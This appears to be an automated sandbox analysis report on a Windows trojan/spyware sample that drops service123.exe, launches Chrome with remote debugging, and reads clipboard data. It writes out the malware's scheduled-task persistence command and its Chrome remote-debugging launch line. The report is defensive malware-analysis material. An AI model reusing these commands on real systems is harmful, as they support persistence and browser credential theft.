Source: chrome.exe, 00000004.00000002.2168420648.0000036C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167320808.0000036C026F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000004.00000002.2168596906.0000036C02994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167349073.0000036C02708000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000004.00000002.2168596906.0000036C02994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167199085.0000036C026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000004.00000002.2168596906.0000036C02994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167199085.0000036C026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000004.00000002.2169962004.0000036C02C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000004.00000002.2165779991.0000036C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172999131.0000036C0300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173041171.0000036C03018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2156566388.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172999131.0000036C0300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000004.00000002.2170544629.0000036C02CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170109304.0000036C02C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166328197.0000036C024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173041171.0000036C03018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2156566388.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166328197.0000036C024F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2156566388.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2173041171.0000036C03018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2156566388.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172999131.0000036C0300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000002.2172948056.0000036C02FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2156566388.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172999131.0000036C0300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2167228646.0000036C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000002.2169962004.0000036C02C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2169962004.0000036C02C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2168177166.0000036C02914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2165125919.0000036C0228F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2168177166.0000036C02914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2165169784.0000036C022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2165779991.0000036C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2168833767.0000036C029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168941010.0000036C02A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167228646.0000036C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2168833767.0000036C029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168941010.0000036C02A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167228646.0000036C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2170067755.0000036C02C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2165779991.0000036C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2169005269.0000036C02A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2171416675.0000036C02E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2171416675.0000036C02E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2171416675.0000036C02E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2170544629.0000036C02CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167096677.0000036C02628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000002.2168047680.0000036C028B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2169005269.0000036C02A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2169652595.0000036C02B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2165779991.0000036C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169208862.0000036C02A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2169652595.0000036C02B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2165779991.0000036C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169208862.0000036C02A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2167562513.0000036C027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168420648.0000036C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167320808.0000036C026F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2171344775.0000036C02DD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2168420648.0000036C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000004.00000002.2166089603.0000036C024A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000004.00000002.2167228646.0000036C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2170202285.0000036C02C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2164926675.0000036C0221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167562513.0000036C027B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2165859019.0000036C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2171517207.0000036C02E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2167228646.0000036C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000003.2140199657.0000036C0287C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167149171.0000036C02684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167956106.0000036C02894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0E9E27

System Summary

barindex
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: 95e1Fwp61u.exe Static PE information: section name: .idata
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B451B0 8_2_00B451B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B43E20 8_2_00B43E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112CCE 8_2_6C112CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DCD00 8_2_6C0DCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DEE50 8_2_6C0DEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E0FC0 8_2_6C0E0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AC0 8_2_6C120AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E44F0 8_2_6C0E44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1146E0 8_2_6C1146E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1107D0 8_2_6C1107D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1087C0 8_2_6C1087C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120060 8_2_6C120060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112090 8_2_6C112090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C102360 8_2_6C102360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12DC70 8_2_6C12DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E5880 8_2_6C0E5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1098F0 8_2_6C1098F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C117A20 8_2_6C117A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11DBEE 8_2_6C11DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11140E 8_2_6C11140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C121510 8_2_6C121510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11F610 8_2_6C11F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FF760 8_2_6C0FF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D3000 8_2_6C0D3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1950D0 8_2_6C1950D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E70C0 8_2_6C0E70C0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 588990BA03C40D8FA04671C882E1BF46773A14AC6AA8E15A556FFEBC18D82EEA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C19ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3560 appears 43 times
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1144
Source: 95e1Fwp61u.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 95e1Fwp61u.exe Static PE information: Section: wfipzyes ZLIB complexity 0.9943886664944903
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@14/4
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5288
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2166949765.0000036C02614000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 95e1Fwp61u.exe Virustotal: Detection: 48%
Source: 95e1Fwp61u.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\95e1Fwp61u.exe "C:\Users\user\Desktop\95e1Fwp61u.exe"
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2000,i,15655755230875397707,13609631537999439981,262144 /prefetch:8
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1144
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2000,i,15655755230875397707,13609631537999439981,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: 95e1Fwp61u.exe Static file information: File size 4509184 > 1048576
